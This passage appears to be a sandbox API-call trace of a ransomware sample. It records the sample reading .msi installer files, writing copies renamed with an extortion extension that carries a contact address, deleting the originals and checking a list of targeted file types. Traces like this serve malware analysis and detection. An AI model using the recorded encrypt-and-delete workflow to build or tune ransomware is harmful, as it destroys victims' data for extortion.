nNumberOfBytesToWrite=0xd5010, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0xd5010, lpOverlapped=0x0) returned 1 [0055.484] ReadFile (in: hFile=0x324, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0055.484] WriteFile (in: hFile=0x2d4, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x100, lpOverlapped=0x0) returned 1 [0055.484] SetEndOfFile (hFile=0x2d4) returned 1 [0055.485] CloseHandle (hObject=0x2d4) returned 1 [0055.932] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0055.941] SetEndOfFile (hFile=0x324) returned 1 [0055.949] CloseHandle (hObject=0x324) returned 1 [0055.950] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0055.950] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi")) returned 1 [0055.950] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0055.950] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0055.950] lstrlenW (lpString=".doc") returned 4 [0055.950] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0055.950] lstrlenW (lpString=".docx") returned 5 [0055.950] lstrcmpiW (lpString1=".docx", lpString2="4.msi") returned -1 [0055.950] lstrlenW (lpString=".pdf") returned 4 [0055.950] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0055.950] lstrlenW (lpString=".xls") returned 4 [0055.950] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0055.951] lstrlenW (lpString=".xlsx") returned 5 [0055.951] lstrcmpiW (lpString1=".xlsx", lpString2="4.msi") returned -1 [0055.951] lstrlenW (lpString=".ppt") returned 4 [0055.951] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0055.951] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0055.951] lstrlenW (lpString=".zip") returned 4 [0055.951] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0055.951] lstrlenW (lpString=".rar") returned 4 [0055.951] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0055.951] lstrlenW (lpString=".bz2") returned 4 [0055.951] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0055.951] lstrlenW (lpString=".7z") returned 3 [0055.951] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0055.951] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0055.951] lstrlenW (lpString=".dbf") returned 4 [0055.952] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0055.952] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0055.952] lstrlenW (lpString=".1cd") returned 4 [0055.952] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0055.952] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0055.952] lstrlenW (lpString=".jpg") returned 4 [0055.952] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0055.952] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0055.952] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0055.952] lstrlenW (lpString=".doc") returned 4 [0055.952] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0055.952] lstrlenW (lpString=".docx") returned 5 [0055.952] lstrcmpiW (lpString1=".docx", lpString2="4.msi") returned -1 [0055.952] lstrlenW (lpString=".pdf") returned 4 [0055.952] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0055.952] lstrlenW (lpString=".xls") returned 4 [0055.952] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0055.952] lstrlenW (lpString=".xlsx") returned 5 [0055.952] lstrcmpiW (lpString1=".xlsx", lpString2="4.msi") returned -1 [0055.952] lstrlenW (lpString=".ppt") returned 4 [0055.952] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0055.952] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0055.952] lstrlenW (lpString=".zip") returned 4 [0055.952] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0055.953] lstrlenW (lpString=".rar") returned 4 [0055.953] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0055.953] lstrlenW (lpString=".bz2") returned 4 [0055.953] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0055.953] lstrlenW (lpString=".7z") returned 3 [0055.953] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0055.953] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0055.953] lstrlenW (lpString=".dbf") returned 4 [0055.953] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0055.953] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0055.953] lstrlenW (lpString=".1cd") returned 4 [0055.953] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0055.953] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 44 [0055.953] lstrlenW (lpString=".jpg") returned 4 [0055.953] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0055.953] lstrcmpiW (lpString1=".msi", lpString2=".bat") returned 1 [0055.953] lstrlenW (lpString="netfx_Extended_x86.msi") returned 22 [0055.953] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0055.953] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=495616) returned 1 [0055.953] CloseHandle (hObject=0x324) returned 1 [0055.953] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi")) returned 0x80 [0055.953] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0055.954] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0055.955] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0055.955] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0055.955] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0055.955] GetLastError () returned 0x0 [0055.955] ReadFile (in: hFile=0x324, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x79000, lpOverlapped=0x0) returned 1 [0055.964] WriteFile (in: hFile=0x2d4, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x79010, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x79010, lpOverlapped=0x0) returned 1 [0055.973] ReadFile (in: hFile=0x324, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0055.973] WriteFile (in: hFile=0x2d4, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x100, lpOverlapped=0x0) returned 1 [0055.973] SetEndOfFile (hFile=0x2d4) returned 1 [0055.973] CloseHandle (hObject=0x2d4) returned 1 [0056.249] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.249] SetEndOfFile (hFile=0x324) returned 1 [0056.253] CloseHandle (hObject=0x324) returned 1 [0056.254] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0056.254] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi")) returned 1 [0056.254] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0056.254] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0056.254] lstrlenW (lpString=".doc") returned 4 [0056.254] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0056.254] lstrlenW (lpString=".docx") returned 5 [0056.254] lstrcmpiW (lpString1=".docx", lpString2="6.msi") returned -1 [0056.254] lstrlenW (lpString=".pdf") returned 4 [0056.254] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0056.254] lstrlenW (lpString=".xls") returned 4 [0056.254] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0056.254] lstrlenW (lpString=".xlsx") returned 5 [0056.255] lstrcmpiW (lpString1=".xlsx", lpString2="6.msi") returned -1 [0056.255] lstrlenW (lpString=".ppt") returned 4 [0056.255] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0056.255] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0056.255] lstrlenW (lpString=".zip") returned 4 [0056.255] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0056.255] lstrlenW (lpString=".rar") returned 4 [0056.255] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0056.255] lstrlenW (lpString=".bz2") returned 4 [0056.255] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0056.255] lstrlenW (lpString=".7z") returned 3 [0056.255] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0056.255] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0056.255] lstrlenW (lpString=".dbf") returned 4 [0056.255] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0056.255] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0056.255] lstrlenW (lpString=".1cd") returned 4 [0056.255] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0056.255] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0056.255] lstrlenW (lpString=".jpg") returned 4 [0056.255] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0056.255] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0056.255] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0056.255] lstrlenW (lpString=".doc") returned 4 [0056.255] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0056.255] lstrlenW (lpString=".docx") returned 5 [0056.255] lstrcmpiW (lpString1=".docx", lpString2="6.msi") returned -1 [0056.255] lstrlenW (lpString=".pdf") returned 4 [0056.256] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0056.256] lstrlenW (lpString=".xls") returned 4 [0056.256] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0056.256] lstrlenW (lpString=".xlsx") returned 5 [0056.256] lstrcmpiW (lpString1=".xlsx", lpString2="6.msi") returned -1 [0056.256] lstrlenW (lpString=".ppt") returned 4 [0056.256] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0056.256] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0056.256] lstrlenW (lpString=".zip") returned 4 [0056.256] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0056.256] lstrlenW (lpString=".rar") returned 4 [0056.256] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0056.256] lstrlenW (lpString=".bz2") returned 4 [0056.256] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0056.256] lstrlenW (lpString=".7z") returned 3 [0056.256] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0056.256] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0056.256] lstrlenW (lpString=".dbf") returned 4 [0056.256] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0056.256] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0056.256] lstrlenW (lpString=".1cd") returned 4 [0056.256] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0056.256] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0056.256] lstrlenW (lpString=".jpg") returned 4 [0056.256] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0056.257] lstrcmpiW (lpString1=".msi", lpString2=".bat") returned 1 [0056.257] lstrlenW (lpString="RGB9RAST_x64.msi") returned 16 [0056.257] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0056.257] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=184832) returned 1 [0056.257] CloseHandle (hObject=0x324) returned 1 [0056.257] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi")) returned 0x80 [0056.257] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.257] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0056.257] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.257] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.258] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0056.258] GetLastError () returned 0x0 [0056.258] ReadFile (in: hFile=0x324, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x2d200, lpOverlapped=0x0) returned 1 [0056.263] WriteFile (in: hFile=0x2d4, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x2d210, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x2d210, lpOverlapped=0x0) returned 1 [0056.267] ReadFile (in: hFile=0x324, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0056.267] WriteFile (in: hFile=0x2d4, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0xf4, lpOverlapped=0x0) returned 1 [0056.267] SetEndOfFile (hFile=0x2d4) returned 1 [0056.267] CloseHandle (hObject=0x2d4) returned 1 [0056.272] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.272] SetEndOfFile (hFile=0x324) returned 1 [0056.274] CloseHandle (hObject=0x324) returned 1 [0056.274] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0056.275] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi")) returned 1 [0056.275] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0056.275] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0056.275] lstrlenW (lpString=".doc") returned 4 [0056.275] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0056.275] lstrlenW (lpString=".docx") returned 5 [0056.275] lstrcmpiW (lpString1=".docx", lpString2="4.msi") returned -1 [0056.275] lstrlenW (lpString=".pdf") returned 4 [0056.275] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0056.275] lstrlenW (lpString=".xls") returned 4 [0056.275] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0056.275] lstrlenW (lpString=".xlsx") returned 5 [0056.275] lstrcmpiW (lpString1=".xlsx", lpString2="4.msi") returned -1 [0056.275] lstrlenW (lpString=".ppt") returned 4 [0056.275] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0056.275] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0056.275] lstrlenW (lpString=".zip") returned 4 [0056.276] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0056.276] lstrlenW (lpString=".rar") returned 4 [0056.276] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0056.276] lstrlenW (lpString=".bz2") returned 4 [0056.276] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0056.276] lstrlenW (lpString=".7z") returned 3 [0056.276] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0056.276] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0056.276] lstrlenW (lpString=".dbf") returned 4 [0056.276] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0056.276] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0056.276] lstrlenW (lpString=".1cd") returned 4 [0056.276] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0056.276] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0056.276] lstrlenW (lpString=".jpg") returned 4 [0056.276] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0056.276] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0056.276] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0056.276] lstrlenW (lpString=".doc") returned 4 [0056.276] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0056.276] lstrlenW (lpString=".docx") returned 5 [0056.276] lstrcmpiW (lpString1=".docx", lpString2="4.msi") returned -1 [0056.276] lstrlenW (lpString=".pdf") returned 4 [0056.276] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0056.276] lstrlenW (lpString=".xls") returned 4 [0056.276] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0056.276] lstrlenW (lpString=".xlsx") returned 5 [0056.277] lstrcmpiW (lpString1=".xlsx", lpString2="4.msi") returned -1 [0056.277] lstrlenW (lpString=".ppt") returned 4 [0056.277] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0056.277] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0056.277] lstrlenW (lpString=".zip") returned 4 [0056.277] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0056.277] lstrlenW (lpString=".rar") returned 4 [0056.277] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0056.277] lstrlenW (lpString=".bz2") returned 4 [0056.277] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0056.277] lstrlenW (lpString=".7z") returned 3 [0056.277] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0056.277] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0056.277] lstrlenW (lpString=".dbf") returned 4 [0056.277] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0056.277] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0056.277] lstrlenW (lpString=".1cd") returned 4 [0056.277] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0056.277] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0056.277] lstrlenW (lpString=".jpg") returned 4 [0056.277] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0056.277] lstrcmpiW (lpString1=".msi", lpString2=".bat") returned 1 [0056.277] lstrlenW (lpString="RGB9Rast_x86.msi") returned 16 [0056.277] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0056.278] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=94720) returned 1 [0056.278] CloseHandle (hObject=0x324) returned 1 [0056.278] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi")) returned 0x80 [0056.278] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.278] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0056.278] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.278] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.278] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0056.279] GetLastError () returned 0x0 [0056.279] ReadFile (in: hFile=0x324, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x17200, lpOverlapped=0x0) returned 1 [0056.282] WriteFile (in: hFile=0x2d4, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x17210, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x17210, lpOverlapped=0x0) returned 1 [0056.545] ReadFile (in: hFile=0x324, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0056.545] WriteFile (in: hFile=0x2d4, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0xf4, lpOverlapped=0x0) returned 1 [0056.545] SetEndOfFile (hFile=0x2d4) returned 1 [0056.545] CloseHandle (hObject=0x2d4) returned 1 [0056.548] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.548] SetEndOfFile (hFile=0x324) returned 1 [0056.550] CloseHandle (hObject=0x324) returned 1 [0056.550] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0056.550] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi")) returned 1 [0056.551] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0056.551] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0056.551] lstrlenW (lpString=".doc") returned 4 [0056.551] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0056.551] lstrlenW (lpString=".docx") returned 5 [0056.551] lstrcmpiW (lpString1=".docx", lpString2="6.msi") returned -1 [0056.551] lstrlenW (lpString=".pdf") returned 4 [0056.551] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0056.551] lstrlenW (lpString=".xls") returned 4 [0056.551] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0056.551] lstrlenW (lpString=".xlsx") returned 5 [0056.551] lstrcmpiW (lpString1=".xlsx", lpString2="6.msi") returned -1 [0056.551] lstrlenW (lpString=".ppt") returned 4 [0056.551] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0056.551] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0056.551] 